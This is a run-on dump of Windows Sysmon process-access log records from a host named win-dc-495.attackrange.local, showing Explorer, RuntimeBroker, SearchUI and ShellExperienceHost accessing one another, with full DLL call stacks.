13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12a3cc|C:\Windows\System32\TwinUI.dll+b60d4|C:\Windows\System32\TwinUI.dll+b1e1b|C:\Windows\System32\TwinUI.dll+d206a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000013144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000013143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000013142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+103361|C:\Windows\System32\Windows.Storage.dll+102e5a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+103361|C:\Windows\System32\Windows.Storage.dll+102e5a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+103361|C:\Windows\System32\Windows.Storage.dll+102e5a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+103361|C:\Windows\System32\Windows.Storage.dll+102e5a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a205e|C:\Windows\System32\SHELL32.dll+d3fe2|C:\Windows\System32\SHELL32.dll+dd79a|C:\Windows\System32\Windows.Storage.dll+1570dd|C:\Windows\System32\Windows.Storage.dll+156d23|C:\Windows\System32\Windows.Storage.dll+103180|C:\Windows\System32\Windows.Storage.dll+102e5a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a1fc8|C:\Windows\System32\SHELL32.dll+d3fe2|C:\Windows\System32\SHELL32.dll+dd79a|C:\Windows\System32\Windows.Storage.dll+1570dd|C:\Windows\System32\Windows.Storage.dll+156d23|C:\Windows\System32\Windows.Storage.dll+103180|C:\Windows\System32\Windows.Storage.dll+102e5a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+a1faa|C:\Windows\System32\SHELL32.dll+d3fe2|C:\Windows\System32\SHELL32.dll+dd79a|C:\Windows\System32\Windows.Storage.dll+1570dd|C:\Windows\System32\Windows.Storage.dll+156d23|C:\Windows\System32\Windows.Storage.dll+103180|C:\Windows\System32\Windows.Storage.dll+102e5a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+a1faa|C:\Windows\System32\SHELL32.dll+d3fe2|C:\Windows\System32\SHELL32.dll+dd79a|C:\Windows\System32\Windows.Storage.dll+1570dd|C:\Windows\System32\Windows.Storage.dll+156d23|C:\Windows\System32\Windows.Storage.dll+103180|C:\Windows\System32\Windows.Storage.dll+102e5a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+103f88|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 